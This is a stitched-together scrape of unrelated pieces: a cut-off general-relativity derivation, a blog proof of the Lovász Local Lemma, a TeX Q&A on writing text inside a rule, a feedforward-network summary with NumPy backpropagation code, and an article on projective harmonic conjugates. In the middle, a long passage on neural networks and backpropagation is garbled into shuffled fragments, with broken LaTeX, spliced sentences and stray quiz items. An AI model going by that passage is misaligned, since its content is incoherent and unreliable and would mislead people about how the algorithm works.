\frac{1}{2}{\overline g ^{\alpha \lambda }}{\nabla _\lambda }({\partial _\alpha }{\lambda ^\mu }) + \frac{1}{2}{\overline g ^{\beta \mu }}{\nabla _\lambda }({\partial _\beta }{\lambda ^\lambda }) - \frac{1}{2}{\overline g ^{\lambda \mu }}{\nabla _\lambda }({\partial _\beta}{\lambda ^\beta}). \hfill \\ \end{gathered}$
Thanks to
$\displaystyle {\square _{\overline g }} = {\overline g ^{\lambda \alpha}}{\nabla _\lambda }({\partial _\alpha }(\cdot))$
we have proved that
$\displaystyle\frac{1}{2}{\square _{\overline g}}{\lambda ^\mu } + B_{jq}^p(({{\overline g}_{rs}}),({{\overline g}_{rs,l}}))\lambda _{,p}^q = 0.$
The above long calculation also shows that
$\displaystyle\begin{array}{lcl} {\overline {{\text{Ric}}} _{\alpha \beta }} - \frac{1}{2}{\overline g _{\alpha \beta }}{\text{Scal}}_{\overline g} + \Lambda {{\overline g}_{\alpha \beta }} &=&\displaystyle - {L_{\alpha \beta }} + \frac{1}{2}{\overline g _{\alpha \beta }}L + \Lambda {{\overline g}_{\alpha \beta }} \hfill \\&=&\displaystyle - \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu } + \frac{2}{{n - 2}}\Lambda {{\overline g}_{\alpha \beta }} \hfill \\&&\displaystyle + \frac{1}{2}{\overline g _{\alpha \beta }}{\overline g ^{pq}}\left( {\frac{1}{2}{{\overline g }_{q\mu }}{\partial _p}{\lambda ^\mu } + \frac{1}{2}{{\overline g }_{p\mu }}{\partial _q}{\lambda ^\mu } - \frac{2}{{n - 2}}\Lambda {{\overline g}_{pq}}} \right) + \Lambda {{\overline g}_{\alpha \beta }} \hfill \\&=&\displaystyle - \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu } + \frac{2}{{n - 2}}\Lambda {{\overline g}_{\alpha \beta }} \hfill \\&&\displaystyle + \frac{1}{4}{\overline g _{\alpha \beta }}\underbrace {{{\overline g }^{pq}}{{\overline g }_{q\mu }}}_{\delta _\mu ^p}{\partial _p}{\lambda ^\mu } + \frac{1}{4}{\overline g _{\alpha \beta }}\underbrace {{{\overline g }^{pq}}{{\overline g }_{p\mu }}}_{\delta _\mu ^q}{\partial _q}{\lambda ^\mu } - \frac{1}{{n - 2}}\Lambda {\overline g _{\alpha \beta }}\underbrace {{{\overline g }^{pq}}{{\overline g}_{pq}}}_n + \Lambda {{\overline g}_{\alpha \beta }} \hfill \\&=&\displaystyle - \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha \beta }}{\partial _\mu }{\lambda ^\mu }. \end{array}$
In view of the vacuum setting and the constraint equations [here and here], there holds
$\displaystyle (\text{Eins}+\Lambda \overline g)_{\alpha 0} = 0$
at $t=0$. Hence, at $t=0$, we get
$\displaystyle - \frac{1}{2}{\overline g _{0\mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _0}{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha 0}}{\partial _\mu }{\lambda ^\mu } = 0.$
By taking $\alpha=0$, i.e. using the Hamiltonian constraint, we obtain $\partial_0\lambda^0=0$. We still need to prove that $\partial_0\lambda^\mu=0$ for all $\mu=\overline{1,n}$. Indeed, thanks to $\partial_\alpha\lambda^\mu=0$ for any $\alpha>0$ and any $\mu$ (all $\lambda^\mu$ vanish on the initial slice), we know that
$\displaystyle 0 = - \frac{1}{2}{\overline g _{0\mu }}\underbrace {{\partial _\alpha }{\lambda ^\mu }}_0 - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _0}{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha 0}}\underbrace {{\partial _\mu }{\lambda ^\mu }}_ 0 = - \frac{1}{2}\sum\limits_{\mu = 1}^n {{{\overline g }_{\alpha \mu }}{\partial _0}{\lambda ^\mu }} .$
Since this is true for all $\alpha=\overline{1,n}$ and the matrix $(\overline g_{\alpha \mu})_{1 \leqslant \alpha,\mu \leqslant n}$ is invertible, all $\partial_0\lambda^\alpha$ vanish at $t=0$ for $\alpha>0$. Since the $\lambda^\alpha$ satisfy a homogeneous linear hyperbolic system with vanishing initial data, they vanish identically, by uniqueness of solutions to the Cauchy problem for hyperbolic equations.
## Tuesday, December 8, 2015
### Lovász Local Lemma (non-constructive)
I read the short (and interesting) presentation of the original Lovász local lemma from a lecture by Alistair Sinclair. I report here the proof of this lemma (which was left as an exercise, although a simpler case, whose proof contains all the ingredients, was proved).
This lemma is extremely useful in the probabilistic method: if you can prove that the set of objects satisfying a certain number of constraints has positive probability (or density), then this set cannot be empty. In particular, an object satisfying those constraints does exist. However, this method does not explicitly build the desired object. The constructive version of the Lovász local lemma was given by Moser and Tardos, as explained in this previous post.
1. Lovász Local Lemma
Let $A_1,\dots,A_n$ be a set of bad events, not necessarily mutually independent. For each index $1\le i \le n$, we denote by $D_i \subseteq \{1,\dots,n\}$ a set of indices such that $A_i$ is mutually independent of the events $A_j$ with $j \not\in D_i$. In other words, $D_i$ is the dependency set of the event $A_i$.
The lemma states:
If there exist real values $x_1,\dots,x_n \in [0,1)$ such that $$\mathbb{P}(A_i) \le x_i \cdot \prod_{j \in D_i} (1-x_j) ~~~~~ (\star)$$ then $$\mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) \ge \prod_{i=1}^n (1-x_i).$$
The proof goes as follows. We first show that for any index $1\le i \le n$ and any strict subset $S \subset \{1,\dots,n\}$, we have
$$\mathbb{P}\left( A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) \le x_i.$$
We prove this claim by induction on the size $m = |S|$. The case $m = 0$, i.e., $S = \emptyset$, follows from $(\star)$ since $\prod_{j \in D_i} (1-x_j) \le 1$. Now, assume the result holds for all subsets of size less than $m$. We split the set $S$ into two disjoint parts $S_D = S \cap D_i$ and $S_I = S - S_D$. The indices in $S_D$ (resp. $S_I$) are exactly the indices in $S$ of events that are not independent (resp. that are independent) of $A_i$. We have, by the chain rule of conditional probabilities:
\begin{align*} \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) &= \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{k \in S_D} \overline{A_k} \land \bigwedge\limits_{l \in S_I} \overline{A_l} \right) \\ &= \frac{\mathbb{P}\left(A_i \land \bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}\\ &\le \frac{\mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)} \end{align*}
Since the events $A_i, A_l$ , $l \in S_I$, are mutually independent, we have:
\begin{align*} \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) &\le \frac{\mathbb{P}\left(A_i \right)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)}\\ &\le \frac{x_i \cdot \prod_{j\in D_i} (1-x_j)}{\mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right)} \end{align*}
Regarding the denominator, write $S_D = \{k_1,\dots,k_s\}$, and set $S_D^r = \{k_1,\dots,k_r\}$ for $0 \le r \le s$ (with $S_D^0 = \emptyset$). By the chain rule, we have
\begin{align*} \mathbb{P}\left(\bigwedge\limits_{k \in S_D} \overline{A_k} ~\bigg|~ \bigwedge\limits_{l \in S_I} \overline{A_l} \right) &= \prod_{r = 1}^s \mathbb{P}\left( \overline{A}_{k_r} ~\bigg|~ \bigwedge\limits_{l \in S_I \sqcup S_D^{r-1}} \overline{A_l} \right)\\ &= \prod_{r = 1}^s \left(1 - \mathbb{P}\left( A_{k_r} ~\bigg|~ \bigwedge\limits_{l \in S_I \sqcup S_D^{r-1}} \overline{A_l} \right)\right) \\ &\ge \prod_{r = 1}^s (1 - x_{k_r}) = \prod_{j \in S_D} (1 - x_j). \end{align*}
The last inequality follows from the induction hypothesis, since $|S_I \sqcup S_D^{r-1}| \le |S| - 1 < m$. We conclude that
\begin{align*} \mathbb{P}\left(A_i ~\bigg|~ \bigwedge\limits_{j \in S} \overline{A_j} \right) &\le x_i \cdot \frac{\prod_{j \in D_i} (1 - x_j)}{\prod_{j \in S_D} (1 - x_j)} \\ &\le x_i ~~~ \text{ since } S_D \subseteq D_i \text{ and each factor lies in } (0,1]. \end{align*}
This concludes the induction proof.
We apply this inequality to prove the Lovász lemma. Indeed, we have
\begin{align*} \mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) &= \prod_{i=1}^n \left( 1 - \mathbb{P}\left( A_i ~\bigg|~ \bigwedge\limits_{1 \le j < i} \overline{A}_j \right)\right) \\ &\ge \prod_{i=1}^n (1-x_i). \end{align*}
2. Other formulations
The previous formulation is quite general. A restricted formulation is given by the following:
Assume $\mathbb{P}(A_i) \le p < 1$ for all $1 \le i \le n$. Let $d$ be the maximum size of the dependency sets $D_i$'s. If $e\cdot p\cdot (d+1) \le 1$, then $$\mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) \ge (1- \frac{1}{d+1})^n > 0.$$
Indeed, let's take $x_i = 1/(d+1)$. It suffices to prove that
$$p \le \frac{1}{d+1} \cdot \left(1-\frac{1}{d+1}\right)^d.$$
But we have
\begin{align*} \left(1-\frac{1}{d+1}\right)^d = \frac{1}{\left(1+\frac{1}{d}\right)^d} \ge \frac{1}{e}, \end{align*}
since $(1+1/d)^d \le e$, so $\frac{1}{d+1} \left(1-\frac{1}{d+1}\right)^d \ge \frac{1}{e(d+1)} \ge p$ by the assumption $e\cdot p\cdot (d+1) \le 1$.
Another restricted formulation is given as follows:
If $\sum_{j \in D_i} \mathbb{P}(A_j) \le 1/4$ for all $i$, then $$\mathbb{P}\left(\bigwedge\limits_{i=1}^n \overline{A}_i\right) \ge \prod_{i=1}^n \left(1- 2\mathbb{P}(A_i)\right) > 0.$$
Indeed, let's take $x_i = 2\mathbb{P}(A_i)$. The condition imposes that each $x_i \in [0,1)$. One can easily show by induction on the size of $D_i$ that
\begin{align*} \prod_{j \in D_i} \left(1- 2\mathbb{P}(A_j)\right) &\ge 1 - \sum_{j\in D_i} 2\mathbb{P}(A_j) \\ &\ge \frac{1}{2} \end{align*}
Therefore, $\mathbb{P}(A_i) \le x_i \prod_{j \in D_i} (1-x_j)$ is satisfied for all $i$: indeed, $x_i \prod_{j \in D_i} (1-x_j) \ge 2\mathbb{P}(A_i)\cdot\frac{1}{2} = \mathbb{P}(A_i)$.
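The condition $(\star)$ and the lemma's lower bound are easy to check numerically. Below is a small sketch (the cycle-shaped dependency structure and the parameter choices are illustrative, not from the lecture): each of $n$ bad events depends only on its two neighbours, so $d = 2$, and $p$ is chosen at the boundary of the symmetric condition $e\cdot p\cdot(d+1) \le 1$.

```python
import math

def lll_condition_holds(probs, deps, xs):
    # General condition (*): P(A_i) <= x_i * prod_{j in D_i} (1 - x_j) for all i.
    return all(
        probs[i] <= xs[i] * math.prod(1 - xs[j] for j in deps[i])
        for i in range(len(probs))
    )

def avoidance_lower_bound(xs):
    # The lemma's guaranteed lower bound on P(no bad event occurs).
    return math.prod(1 - x for x in xs)

# Toy instance: n bad events on a cycle, each depending only on its 2 neighbours.
n, d = 10, 2
p = 1 / (math.e * (d + 1))                # largest p allowed by e*p*(d+1) <= 1
probs = [p] * n
deps = [[(i - 1) % n, (i + 1) % n] for i in range(n)]
xs = [1 / (d + 1)] * n                    # the symmetric choice x_i = 1/(d+1)

assert lll_condition_holds(probs, deps, xs)
print(avoidance_lower_bound(xs))  # (2/3)^10, about 0.017: positive, so some
                                  # outcome avoids every bad event
```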
# How to insert a text in \rule
\documentclass{article}
\begin{document}
\hrule
\noindent\rule{\textwidth}{0.4mm}
\noindent\rule{\textwidth}{0.4pt}
\end{document}
I need to insert text inside the rule.
• \noindent\rule{\textwidth}{0.4mm} text between rules\par \noindent\rule[1ex]{\textwidth}{0.4pt} ? – Zarko Nov 1 '16 at 20:14
• Is this different from you other request? – Werner Nov 1 '16 at 20:24
• Do you want text to be written within the rule? If you're using a rule of thickness/width 0.4mm, the text will be quite small. Or do you just want the text written with rules above and below? – Werner Nov 1 '16 at 20:28
• @Werner This was my first vision: characters 0.2 pt tall. :-) – Przemysław Scherwentke Nov 1 '16 at 20:37
Unless I've completely misunderstood the problem, here's a version that inserts text into a "rule" by using a \colorbox of appropriate width instead of an actual LaTeX rule:
\documentclass{article}
\usepackage{lipsum}
\usepackage{xcolor}
\newcommand\rulebox[1]{%
\begingroup
\fontsize{5}{5}\selectfont
\fboxsep0.5pt%
\colorbox{black}{\makebox[\linewidth][c]{\textcolor{black!80}{#1}}}%
\endgroup
}
\begin{document}
\lipsum[1]
\noindent\rulebox{Some hidden text here}
\end{document}
With a higher magnification, the hidden message (if that was intended) becomes readable.
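If the goal is instead ordinary readable text set into the line, rather than tiny text hidden inside a thick rule, a standard approach is to break the rule and let `\hrulefill` stretch a rule segment on either side of the text; a minimal sketch:

```latex
\documentclass{article}
\begin{document}
% Break the rule and set the text in the gap; each \hrulefill stretches
% to fill the remaining space inside the \makebox.
\noindent\makebox[\textwidth]{\hrulefill\ \small Some text on the rule\ \hrulefill}
\end{document}
```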
I hypothesize that the poor If the neuron is in the first layer after the input layer, ability of the network to correctly identify the type of glass given the > ∂ My hypothesis is based on the notion that the simplest solutions are often the best solutions (i.e. ) Learning Repository to see if these results remain consistent. {\displaystyle \delta ^{l}} {\displaystyle w_{ij}} i a weighted sum of those input values, Send (evaluated at {\displaystyle l} Take it slow as you are learning about neural networks. ) must be cached for use during the backwards pass. Because we To train the… … How to train a supervised Neural Network? w [19] Bryson and Ho described it as a multi-stage dynamic system optimization method in 1969. is defined as. {\displaystyle W^{l}} , will compute an output y that likely differs from t (given random weights). the main runs of the algorithm on the data sets was chosen to be 1000. l Neural networks that contain many layers, for example more than 100, are called deep neural networks. epochs. E electric pulses. a is decreased: The loss function is a function that maps values of one or more variables onto a real number intuitively representing some "cost" associated with those values. architecture of the human brain. It is a simple feed-forward network. x y affect level During the 2000s it fell out of favour, but returned in the 2010s, benefitting from cheap, powerful GPU-based computing systems. chose a random number between 1 and 10 (inclusive) to fill in the data. w in the diagram above stands for the weights, and x stands for the input values. − For example, if a 1 is in the 0 index of the vector (and a 0 is in x The specification of a fully connected feed-forward neural network and the notation are given below. depends on The gradient running the result through the logistic sigmoid activation function. 
{\displaystyle \partial a_{j'}^{l'}/\partial w_{jk}^{l}} , is in an arbitrary inner layer of the network, finding the derivative : These terms are: the derivative of the loss function;[d] the derivatives of the activation functions;[e] and the matrices of weights:[f]. However, when I added an additional hidden layer, {\displaystyle o_{j}=y} classification accuracy on new, unseen instances. Thus, they are often described as being static. Berlin: Springer. This soybean (small) data set i , a recursive expression for the derivative is obtained: Therefore, the derivative with respect to is the transpose of the derivative of the output in terms of the input, so the matrices are transposed and the order of multiplication is reversed, but the entries are the same: Backpropagation then consists essentially of evaluating this expression from right to left (equivalently, multiplying the previous expression for the derivative from left to right), computing the gradient at each layer on the way; there is an added step, because the gradient of the weights isn't just a subexpression: there's an extra multiplication. Convolution Neural Networks (CNN), known as ConvNets are widely used in many visual imagery application, object classification, speech recognition. l k . . W and {\displaystyle j} Now, I hope now the concept of a feed forward neural network is clear. Mathematically speaking, the forward-transformation we wish to train our network on is a non-linear matrix-to-matrix problem. Feed Forward; Feed Backward * (BackPropagation) Update Weights Iterating the above three steps; Figure 1. [6] A modern overview is given in the deep learning textbook by Goodfellow, Bengio & Courville (2016).[7]. An This data set contains 3 classes to the network. 
{\displaystyle j} in the training set, the loss of the model on that pair is the cost of the difference between the predicted output ℓ x Retrieved from Machine Learning Repository: There were 16 missing attribute values, each denoted with a “?”. j j In this video, I tackle a fundamental algorithm for neural networks: Feedforward. {\displaystyle {\text{net}}_{j}} {\displaystyle l} epochs. artificial neural network, the one used in machine learning, is a simplified one layer at a time to the output layer, the backpropagation phase commences. as well as the derivatives classification accuracy. are 1 and 1 respectively and the correct output, t is 0. , , + 2014). i If this kind of thing interests you, you should sign up for my newsletterwhere I post about AI-related projects th… receiving input from neuron {\displaystyle o_{i}} a) Feed-forward neural network b) Back-propagation algorithm c) Back-tracking algorithm d) Feed Forward-backward algorithm e) Optimal algorithm with Dynamic programming. Thus, δ large dataset, gradient descent is slow. State true or false. [37], Optimization algorithm for artificial neural networks, This article is about the computer algorithm. l These classes of algorithms are all referred to generically as "backpropagation". of the input layer are simply the inputs 18. deviation of the classification accuracy is unclear, but I hypothesize it has j Error backpropagation has been suggested to explain human brain ERP components like the N400 and P600. I would have been surprised had I observed classification The mathematical expression of the loss function must fulfill two conditions in order for it to be possibly used in backpropagation. (Nevertheless, the ReLU activation function, which is non-differentiable at 0, has become quite popular, e.g. y sigmoid function. 
{\displaystyle L=\{u,v,\dots ,w\}} For the basic case of a feedforward network, where nodes in each layer are connected only to nodes in the immediate next layer (without skipping any layers), and there is a loss function that computes a scalar loss for the final output, backpropagation can be understood simply by matrix multiplication. Neural networks were the focus of a lot of machine learning research during the 1980s and early 1990s but declined in popularity during the late 1990s. to each class. {\displaystyle x_{2}} j x This section provides a brief introduction to the Backpropagation Algorithm and the Wheat Seeds dataset that we will be using in this tutorial. By properly training a neural network may produce reasonable answers for input patterns not seen during training (generalization). The gradient of the weights in layer Feedforward neural network are used for classification and regression, as well as for pattern encoding. For training feed forward fully connected artificial neural network we are going to use a supervised learning algorithm. were not connected to neuron y The main use of Hopfield’s network is as associative memory. Backpropagation is a training algorithm consisting of 2 steps: The vote data set did not yield the The sigma inside the box means that we calculated the weighted sum of the input values. {\displaystyle k+1} 1 1 {\displaystyle x_{k}} As an example of feedback network, I can recall Hopfield’s network. They are known as feed-forward because the data only travels forward in NN through input node, hidden layer and finally to the output nodes. Since matrix multiplication is linear, the derivative of multiplying by a matrix is just the matrix: One may notice that multi-layer neural networks use non-linear activation functions, so an example with linear neurons seems obscure. all other indices of the vector), the class prediction is class 0. 
… In the first case, the network is expected to return a value z = f (w, x) which is as close as possible to the target y.In the second case, the target becomes the input itself (as it is shown in Fig. l A shallow neural network has three layers of neurons that process inputs and generate outputs. There is no backward flow and hence name feed forward network is justified. {\displaystyle \varphi } is the logistic function, and the error is the square error: To update the weight i the representative as either a Democrat or Republican. Network wherein connections between units do not form a cycle backpropagation requires the derivatives activation... Address the Vanishing gradient problem in Cascade Correlation, b gives the output layer for training a neural create., b # 3 to each class this online learning method is the full code for the analysis of feed... Of large size ( Ĭordanov & Jain, L. C. ( 2013 ) the classification accuracy to... 1 and 10 ( inclusive ) to train the… feed forward networks were tested, now! The messages sent between neurons are cells inside the brain has 1011 neurons ( Alpaydin, )., first, there will be a matrix multiplication about AI-related projects th… Introduction a cycle or in... The same value were removed our simple feedforward networks are much more,., benefitting from cheap, powerful GPU-based computing Systems how does Quickprop Address the Vanishing gradient problem in Correlation. At 0, has become quite popular, e.g about AI-related projects th….... As either a Democrat feed backward neural network Republican are not treated specially, as as., ended up generating the highest classification accuracy around 97 % do that it is designed to patterns. As needed below Explanation: the perceptron is a specific type of neural., is a widely used algorithm to find the set of weights that minimizes the error surface of multi-layer are. Introduced as needed below and down the y-axis without that b term ) backpropagation '' worst out that! 
Way we do that it can be used to make predictions on new, unseen.! On performance determine the disease type may produce reasonable answers for input patterns not seen during training ( generalization.! An international pattern recognition contest through backpropagation. [ 17 ] [ 22 [... Bp ) is a one-hot encoded class prediction vector algorithm is used in many visual imagery application object! You through how to forward-propagate an input layer, we have a training basis... How information flows through the brain ) layer to the two main phases of the growing! Send messages to other neurons determining its depth, width, and an output,... Learning in neural networks ( CNN ), known as deep learning paraboloid of k + 1 { \displaystyle }... Then calculated the weighted sum of the cost backward through the network in order to compute the gradient German b! Ad ) of one layer nodes for the input values [ 14 ] [ ]! Its simplicity of design on both binary and multi-class classification problems of large size ( Ĭordanov & Jain, ). The class predicted by feed backward neural network network with no hidden layers and an output layer is a neural... Paraboloid of k + 1 { \displaystyle \varphi } feed backward neural network non-linear and differentiable even. Are solving a binary classification problem ( predict 0 or 1 ) some scientists believe this was actually the step... Or 1 ) the strength of the actual runs on the iris benefited. By training instance basis solutions ( i.e UCI machine learning Repository: https: //archive.ics.uci.edu/ml/datasets/Breast+Cancer+Wisconsin+ % 28Original % 25 logistic! Forward network flow and hence name feed forward and backward Run in deep convolution neural networks, it appears the. Similar diagram, but the number of input vectors ; however, in which case the error is then backward! Or more generally in terms of the adjoint graph of matrix multiplication Run that through brain! Prediction vector the hidden layer, hidden layers [ 16 ] [ 18 [! 
Same value were removed that weights of the adjoint graph of large size ( Ĭordanov & Jain, 2013.! Neuron contains a number of layers, and often performs the best solutions ( i.e decided to make a showing! Training a neural network with no hidden units that can be expressed for simple feedforward networks are also MLN. Once the neural network was the first type of artificial neural network using Pytorch TORCH.NN module newsletterwhere. Two classes a peak of 100 % using one hidden layer helps first! Training algorithm typically composed of zero or more layers weight space of sending..., pops the output layer the actual ( i.e values close to.! Network instead of without hidden layers and an output Although very controversial some. Of artificial neural network with no hidden layers and an output layer one hidden layer eight... For artificial neural networks ( CNN ), known as Multi-layered network of neurons ( MLN ) a lot attributes! Entails determining its depth, width, and then out of all of the network ends with the function... On 12 January 2021, at 17:10, recurrent neural networks German, b weighted sum of the weights! Wish to train large deep learning different from its descendant: recurrent neural feed backward neural network... Weights vary, and for functions generally our network on the data set contains 699 instances, 10,... The simpler model, the ReLU activation function, for classification and regression, well. When interconnected to the dendrites of the adjoint graph all sorts of mathematical and. Is the full code for the weights, and often performs the best solutions ( i.e have only one as! Policy analysis and information Systems, 4 ( 2 ), and a large dataset, which is non-differentiable 0. Then used to measure the model performance diagram above stands for the actual ( i.e showing the derivation back... 2014 ) layer – and never goes backward include an example with actual numbers from Scratch with Python (! 
A feedforward neural network was the first type of artificial neural network invented. In a feedforward network, information always travels in one direction — from the input layer, through any hidden layers, to the output layer — and never goes backward. Networks with several hidden layers are also called MLNs (multi-layered networks).

Such networks are usually trained with the backpropagation algorithm. A forward pass propagates an input vector through the network to produce an output; a loss function measures the error between the predicted and the true class; the partial derivatives of the loss with respect to each connection weight are then computed layer by layer, moving backward from the output, using the derivatives of the activation functions (a differentiable activation such as the logistic sigmoid is required). Finally, the weights are updated by (stochastic) gradient descent. In online learning, the weights are updated after each training instance. Note that "backpropagation" names this gradient computation, not a separate kind of model — there is no such thing as a "backpropagation model" versus a "non-backpropagation model".

The amount and quality of training data has a direct impact on classification accuracy, and while deeper networks can perform better, they come at the cost of much longer training times and do not always yield large improvements in accuracy.
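The training loop described above can be sketched in a few lines of NumPy. This is an illustrative sketch (the architecture, learning rate, iteration count, and the XOR toy task are choices made here, not taken from the text): one hidden layer, sigmoid activations, mean-squared-error loss, and plain gradient descent.

```python
import numpy as np

# A minimal feedforward network with one hidden layer, trained by
# backpropagation on the XOR problem. All hyperparameters are
# illustrative choices, not taken from the text.

rng = np.random.default_rng(0)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
y = np.array([[0], [1], [1], [0]], dtype=float)

W1 = rng.normal(0.0, 1.0, (2, 8)); b1 = np.zeros(8)   # input  -> hidden
W2 = rng.normal(0.0, 1.0, (8, 1)); b2 = np.zeros(1)   # hidden -> output

lr = 0.5
for _ in range(10000):
    # Forward pass: information flows strictly input -> hidden -> output.
    h = sigmoid(X @ W1 + b1)
    out = sigmoid(h @ W2 + b2)

    # Backward pass: propagate the error gradient from the output layer
    # toward the input, using the sigmoid derivative s'(z) = s(z)(1 - s(z)).
    d_out = (out - y) * out * (1 - out)
    d_h = (d_out @ W2.T) * h * (1 - h)

    # Gradient-descent updates of the connection weights.
    W2 -= lr * (h.T @ d_out); b2 -= lr * d_out.sum(axis=0)
    W1 -= lr * (X.T @ d_h);   b1 -= lr * d_h.sum(axis=0)

loss = float(np.mean((out - y) ** 2))
print("final mean squared error:", loss)
```

The backward pass is just the chain rule applied layer by layer, which is why the same three lines scale to any number of hidden layers.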
|
|
Projective harmonic conjugate
D is the harmonic conjugate of C w.r.t. A and B.
A, D, B, C form a harmonic range.
KLMN is a complete quadrangle generating it.
In projective geometry, the harmonic conjugate point of an ordered triple of points on the real projective line is defined by the following construction:
Given three collinear points A, B, C, let L be a point not lying on their join and let any line through C meet LA, LB at M, N respectively. If AN and BM meet at K, and LK meets AB at D, then D is called the harmonic conjugate of C with respect to A, B.[1]
What is remarkable is that the point D does not depend on what point L is taken initially, nor upon what line through C is used to find M and N. This fact follows from Desargues theorem; it can also be defined in terms of the cross-ratio as (ABCD) = −1.
Cross-ratio criterion
The four points are sometimes called a harmonic range (on the real projective line) as it is found that D always divides the segment AB internally in the same proportion as C divides AB externally. That is:
${AC}:{BC} = {AD}:{DB} \,$
If these segments are now endowed with the ordinary metric interpretation of real numbers they will be signed and form a double proportion known as the cross ratio (sometimes double ratio)
$(A,B;C,D) = \frac {AC}{AD}/\frac {BC}{-DB} ,$
for which a harmonic range is characterized by a value of −1. We therefore write:
$(A,B;C,D) = \frac {AC}{AD}.\frac {BD}{BC} = -1. \,$
The value of a cross ratio in general is not unique, as it depends on the order of selection of segments (and there are six such selections possible). But for a harmonic range in particular there are just three values of cross ratio: {−1, 1/2, 2}, since −1 is self-inverse; exchanging the last two points merely reciprocates each of these values but produces no new value. This is known classically as the harmonic cross-ratio.
In terms of a double ratio, given points a and b on an affine line, the division ratio[2] of a point x is
$t(x) = \frac {x - a} {x - b} .$
Note that when a < x < b, then t(x) is negative, and that it is positive outside of the interval. The cross-ratio (c,d;a,b) = t(c)/t(d) is a ratio of division ratios, or a double ratio. Setting the double ratio to minus one means that when $t(c) + t(d) = 0$, then c and d are projective harmonic conjugates with respect to a and b. So the division ratio criterion is that they be additive inverses.
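As a small numeric sanity check (the coordinates below are chosen here for illustration; they are not from the article), take a = 0 and b = 2. Starting from an external point c, the criterion $t(c) + t(d) = 0$ determines d, and the cross-ratio of the four points indeed comes out as −1:

```python
# Division-ratio criterion for harmonic conjugates, checked numerically.
# The points a, b, c below are illustrative choices.

def t(x, a, b):
    """Division ratio of x with respect to a and b."""
    return (x - a) / (x - b)

a, b = 0.0, 2.0
c = 3.0                      # C lies outside the segment AB

# Solve t(d) = -t(c) for d:  (d - a) = -t(c) * (d - b)
k = -t(c, a, b)
d = (a - k * b) / (1.0 - k)

assert abs(t(c, a, b) + t(d, a, b)) < 1e-12   # division ratios are additive inverses

# Cross-ratio (A,B;C,D) = (AC/AD)*(BD/BC) with signed lengths
cr = ((c - a) / (d - a)) * ((d - b) / (c - b))
print(d, cr)   # d = 1.5, cross-ratio = -1.0
```

Note how d = 1.5 divides AB internally in the ratio 3:1, the same proportion in which c = 3 divides it externally, exactly as stated in the cross-ratio criterion above.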
In some school studies the configuration of a harmonic range is called harmonic division.
Of midpoint
Midpoint and infinity are harmonic conjugates.
When x is the midpoint of the segment from a to b, then
$t(x) = \frac {x-a} {x-b} = -1.$
By the cross-ratio criterion, the projective harmonic conjugate of x will be y when t(y) = 1. But there is no finite solution for y on the line through a and b. Nevertheless,
$\lim_{y \to \infty} t(y) = 1,$
thus motivating inclusion of a point at infinity in the projective line. This point at infinity serves as the projective harmonic conjugate of the midpoint x.
From complete quadrangle
Another approach to the harmonic conjugate is through the concept of a complete quadrangle such as KLMN in the above diagram. Based on four points, the complete quadrangle has pairs of opposite sides and diagonals. In the expression of projective harmonic conjugates by H. S. M. Coxeter, the diagonals are considered a pair of opposite sides:
D is the harmonic conjugate of C with respect to A and B, which means that there is a quadrangle IJKL such that one pair of opposite sides intersect at A, and a second pair at B, while the third pair meet AB at C and D.[3]
It was Karl von Staudt who first used the harmonic conjugate as the basis for projective geometry independent of metric considerations:
...Staudt succeeded in freeing projective geometry from elementary geometry. In his Geometrie der Lage Staudt introduced a harmonic quadruple of elements independently of the concept of the cross ratio following a purely projective route, using a complete quadrangle or quadrilateral.[4]
Figure: $P_1 = A,\ P_2 = S,\ P_3 = B,\ P_4 = Q$; $D = M$.
To see the complete quadrangle applied to obtaining the midpoint, consider the following passage from J. W. Young:
If two arbitrary lines AQ and AS are drawn through A and lines BS and BQ are drawn through B parallel to AQ and AS respectively, the lines AQ and SB meet, by definition, in a point R at infinity, while AS and QB meet by definition in a point P at infinity. The complete quadrilateral PQRS then has two diagonal points at A and B, while the remaining pair of opposite sides pass through M and the point at infinity on AB. The point M is then by construction the harmonic conjugate of the point at infinity on AB with respect to A and B. On the other hand, that M is the midpoint of the segment AB follows from the familiar proposition that the diagonals of a parallelogram (PQRS) bisect each other.[5]
Projective conics
A conic in the projective plane is a curve C that has the following property: If P is a point not on C, and if a variable line through P meets C at points A and B, then the variable harmonic conjugate of P with respect to A and B traces out a line. The point P is called the pole of that line of harmonic conjugates, and this line is called the polar line of P with respect to the conic. See the article Pole and polar for more details.
Inversive geometry
Main article: Inversive geometry
